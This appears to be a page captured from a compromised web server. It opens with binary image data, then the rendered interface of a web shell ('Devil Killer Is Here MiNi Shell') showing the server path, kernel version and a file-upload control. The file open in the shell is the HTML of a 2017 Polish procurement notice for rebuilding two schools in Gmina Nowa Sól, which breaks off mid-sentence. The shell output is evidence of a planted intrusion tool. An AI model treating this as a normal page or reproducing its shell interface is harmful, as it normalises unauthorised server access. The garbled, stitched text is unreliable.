JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170512/507271-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 507271-N-2017 z dnia 2017-05-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Nowa Sól</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przebudowa i rozbudowa budynków szkół podstawowych w Przyborowie i Lubieszowie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">środki pochodzące ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego programu Operacyjnego - Lubuskie 2020, oś 9 Infrastruktura społeczna, działanie 9.3 Rozwój infrastruktury edukacyjnej, Poddziałanie 9.3.1 Rozwój infrastruktury edukacyjnej - projekty realizowane poza formułą ZIT</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia">0%</span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Tak</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Nowa Sól</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">97123779900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Moniuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">67100 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowa Sól</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubuskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">68 3872016 w. 28</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@gminanowasol.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">683 873 277</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.gminanowasol.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.gminanowasol.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przebudowa i rozbudowa budynków szkół podstawowych w Przyborowie i Lubieszowie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RG.271.5.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">2</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1) Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na przebudowiei rozbudowie Publicznych Szkół Podstawowych w Przyborowie i Lubieszowie wraz z uzyskaniemzaświadczenia o potwierdzeniu przyjęcia zawiadomienia o zakończeniu budowy lub decyzji pozwoleniana użytkowanie (o ile będzie wymagane).2) Przedmiot zamówienia obejmuje dwie CZĘŚCI (ZADANIA):a) CZĘŚĆ (ZADANIE) 1 - przebudowa i rozbudowa Publicznej Szkoły Podstawowej w Przyborowieb) CZĘŚĆ (ZADANIE) 2 - przebudowa i rozbudowa Publicznej Szkoły Podstawowej w Lubieszowie.CZĘŚĆ (ZADANIE) 1Przebudowa i rozbudowa budynku Publicznej Szkoły Podstawowej w Przyborowie.Przedmiot inwestycji obejmuje w szczególności wykonanie: robót rozbiórkowych i budowlanych,instalacji elektrycznych, instalacji zimnej i ciepłej wody użytkowej, instalacji wodnej przeciwpożarowejhydrantowej oraz kanalizacji w rozbudowywanej części budynku oświaty wewnętrznej instalacjicentralnego ogrzewaniaRozbiórka: -ścian zewnętrznych istniejącej kotłowni, dachu nad kotłownią, (ściany wykonane z pustakaAlfa, nadproża typu L19, dach kotłowni jednospadowy płaski, z płyt dachowych korytkowych, kryty papątermozgrzewalną na izolacji termicznej ze styropianu), -demontaż wyposażenia kotłowni (piece, zbiornikiinstalacje, solarach), -ścianek działowych wewnątrz budynku szkoły (ścianka w wc, w bibliotece,w pokoju nauczycielskim, ścianki w kotłowni, -strefy wejściowej do części sportowej (ściany zewnętrznez pustaka Alfa i stropodach żelbetowy), -betonowych podestów i schodów wejściowych prowadzących naplac sportowy. Projektuje się: -rozbudowę szkoły w części parterowej o: dwie sale lekcyjne (pracowniakomputerowa, pracownia matematyczna), korytarze, strefę wejściową, -zamyka się istniejącą przestrzeńmiędzy skrzydłami pawilonów (dziedziniec) projektując świetlico-stołówkę, przebudowę istniejącejbiblioteki na pracownię przyrodniczą, sanitariatów damsko-męskich, istniejącego pokojunauczycielskiego na wydawalnie posiłków, salki przedszkolnej na pokój nauczycielski, części korytarzana wc dla niepełnosprawnych, kotłowni, -zamurowania, przekucia otworów drzwiowych, -ociepleniei kolorystyka części projektowanej oraz remont elewacji istniejącego budynku, -przebudowa instalacjikanalizacji sanitarnej zewnętrznej na odcinkach między skrzydłami pawilonów szkolnych (dziedziniec).Elementy instalacji elektrycznych: lokalizacja głównej tablicy budynku TG, - lokalizacja tablicyrozdzielczej TR, - główny wyłącznik p.poż. (dla części istniejącej i projektowanej) - wewnętrzna liniazasilająca, - instalacja gniazd wtyczkowych ogólnego przeznaczenia - instalacja gniazd wtyczkowych dlazasilania komputerów, - instalacja oświetlenia ogólnego, - instalacja oświetlania awaryjnegoi ewakuacyjnego (kierunkowego), -instalacja zasilania nasad wentylacyjnych i podgrzewanychnawietrzników, -instalacja odgromowa.CZĘŚĆ (ZADANIE) 2Przebudowa i rozbudowa budynku Publicznej Szkoły Podstawowej w Lubieszowie.Przedmiot inwestycji obejmuje w szczególności wykonanie rozbudowy: - szkoły w kierunku wschodnimz wykorzystaniem istniejących ścian budynku, -instalacji elektrycznej, -instalacji wodno - kanalizacyjnej, - instalacji centralnego ogrzewania; przebudowa doziemnej instalacji kanalizacji sanitarnej tłocznej, -rozbiórka części placu zabaw, - utwardzenie terenu dojścia do klatki schodowej; przebudowa zewnętrznejinstalacji kanalizacji sanitarnej, kanalizacji deszczowej, wewnętrznej instalacji kanalizacji sanitarnej,wodociągowej, wewnętrznej instalacji hydrantowej, centralnego ogrzewania oraz przebudowa kotłownina paliwo stałe . W zakresie elementów instalacji elektrycznych : - lokalizacja głównej tablicy budynkuTG,-lokalizacja tablicy rozdzielczej TR (projektowanej) ,- główny wyłącznik p.poż. (dla części istniejąceji projektowanej), - wewnętrzna linia zasilająca, -instalacja gniazd wtyczkowych ogólnego przeznaczenia,- instalacja gniazd wtyczkowych dla zasilania komputerów, - instalacja oświetlenia ogólnego, - instalacjaoświetlania awaryjnego i ewakuacyjnego (kierunkowego), - instalacja zasilania nasad wentylacyjnychi podgrzewanych nawietrzników, - instalacja odgromowa.3.2.Roboty budowlane należy wykonać w zakresie określonym w dokumentacji projektowej oraz zgodnie zespecyfikacją techniczną wykonania i odbioru robót budowlanych stanowiące załącznik nr 1 do SIWZ -odpowiednio do wybranej CZĘŚCI (ZADANIA).UWAGA:Załączone przedmiary robót służą wyłącznie celom informacyjnym. Wykonawca zobowiązany jest dodokładnego sprawdzenia przedmiaru robót z dokumentacją projektową. Ewentualny brak w przedmiarzerobót koniecznych do wykonania na podstawie dokumentacji projektowej nie zwalnia wykonawcy odobowiązku ich wykonania w ramach wynagrodzenia umownego. W przypadku rozbieżności pomiędzydokumentacją projektową a przedmiarami robót należy przyjąć zakres robót i ich ilość wynikającąz dokumentacją projektową3.3.W przypadku rozbieżności pomiędzy dokumentacją projektową należy wystąpić do zamawiającegoo ich wyjaśnienie.3.4.W przypadku, gdy dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót niepodają w sposób szczegółowy technologii wykonywania robót lub wykonania określonego elementuprzedmiotu zamówienia, bądź też nie precyzują dostatecznie rodzaju i standardu materiałów, wykonawcazobowiązany jest wystąpić do zamawiającego o wyjaśnienie.3.5.Wykonawca zobowiązany jest do przekazania zamawiającemu elementów z demontażu i rozbiórekprzedstawiających w ocenie zamawiającego (np. kostka brukowa betonowa, materiał kamienny, płytkibetonowe, płyty ażurowe) wartość użytkową, nadmiaru humusu i gruntu z wykopów po wykonaniurobót ziemnych, ich załadunku, transportu i rozładunku na własny koszt na miejsce wskazane przezzamawiającego (odwóz na odległość do 12 km).a) pozostałe elementy z rozbiórek wykonawca zobowiązany jest zutylizować własnym staraniemi na własny koszt. Wykonawca pokrywa koszt załadunku i transportu materiału z rozbiórki, któryjest przewidziany do odwozu. Materiały z rozbiórki powinny być składowane np. na paletach wrazz ofoliowaniem. Palety i koszt zabezpieczenia folią stanowi koszt wykonawcy.3.6.Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia i istotne dla stron postanowienia,zawiera wzór umowy- załącznik nr 8.3.8 Standard jakościowe:1) Wszystkie materiały użyte do wykonania zamówienia muszą posiadać dopuszczenie do stosowaniaw budownictwie oraz być pierwszego gatunku. Dokumentami dopuszczającymi do stosowaniaw budownictwie są : certyfikaty zgodności z Polską ( Europejską ) Normą, deklaracje zgodnościz Polską ( Europejską ) Aprobatą Techniczną, aprobaty techniczne, w przypadku wyrobów, dlaktórych nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją .2) Wykonawca jest odpowiedzialny za jakość wykonywanych robót, za zgodność wykonania z Prawembudowlanym i obowiązującymi w tym zakresie przepisami, uzgodnieniami i warunkami zawartymiw dokumentacji projektowej, zawartą z Zamawiającym umową, uzgodnieniami z Zamawiającymdokonanymi w trakcie realizacji przedmiotu zamówienia, zaleceniami nadzoru inwestorskiego,obowiązującymi normami i warunkami technicznymi wykonania i odbioru robót oraz sztukąbudowlaną.3.9. Warunki realizacji robót budowlanych:1) Roboty będące przedmiotem zamówienia wykonywane będą w obiekcie czynnym i użytkowanym.W związku z tym Wykonawca jest zobowiązany do zachowania najwyższej staranności przyzabezpieczeniu miejsca robót, do takiej organizacji i realizacji robót budowlanych, by umożliwićdostęp i bezpieczne użytkowanie pozostałych pomieszczeń obiektu oraz ograniczyć do minimumuciążliwości wynikające z realizacji przedmiotu zamówienia2) Koszty unieszkodliwiania odpadów powstałych podczas robót rozbiórkowych i pozostałychobciążają Wykonawcę.3) Wykonawca przejmuje na siebie obowiązki wytwórcy odpadów w rozumieniu ustawy z dnia 14grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), bez prawa do dodatkowego wynagrodzenia.4) Zaleca się, aby wykonawca dokonał wizji lokalnej w miejscu gdzie mają być wykonywane robotyoraz uzyskał na swoją odpowiedzialność, koszt i ryzyko wszelkie istotne informacje, które mogą byćkonieczne do przygotowania oferty i podpisania umowy.5) Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanychwe wzorze umowy stanowiącym załącznik nr 8 do SIWZ.3.10. Rozliczenie i termin płatności1. Warunki, rozliczenie i terminy płatności zawiera wzór umowy - załącznik nr 8 do SIWZ2. Zamawiający zapłaci wykonawcy wynagrodzenie za wykonanie przedmiotu na podstawie fakturczęściowych wystawianych przez wykonawcę po wykonaniu elementu rozliczeniowego określonegow harmonogramie rzeczowo - finansowym stanowiącym załącznik do umowy oraz fakturykońcowej, przy czym:1) w zakresie CZĘŚCI (ZADANIA) 1 - (Przyborów) - wartość wynagrodzenia wykonawcy zostanierozliczona dwiema fakturami częściowymi, których suma nie może przekroczyć 70 % łącznegowynagrodzenia umownego brutto oraz faktury końcowej obejmującej powstałą częśćwynagrodzenia brutto;2) w zakresie CZĘŚCI (ZADANIA) 2 - (Lubieszów) - wartość wynagrodzenia wykonawcy zostanierozliczona jedną fakturą częściową, której wartość nie może przekroczyć 50 % łącznegowynagrodzenia umownego oraz faktury końcowej obejmującej powstałą część wynagrodzeniabrutto.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232460-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45100000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45410000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44000000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111300-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261910-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262120-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262110-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332200-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">0,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub 